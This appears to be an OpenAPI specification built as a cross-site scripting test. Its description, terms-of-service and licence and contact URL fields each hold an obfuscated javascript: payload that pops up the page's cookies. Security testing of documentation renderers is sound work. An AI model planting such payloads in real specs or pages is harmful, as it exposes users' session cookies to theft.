openapi: 3.3.1
info:
  title: "xss test"
  description: "javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"
  termsOfService: "javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"
  contact:
    name: "xss test"
    email: "xss test"
    url: "javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"
  license:
    name: "xss test"
    url: "javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"
  version: "1.0"
paths: {}
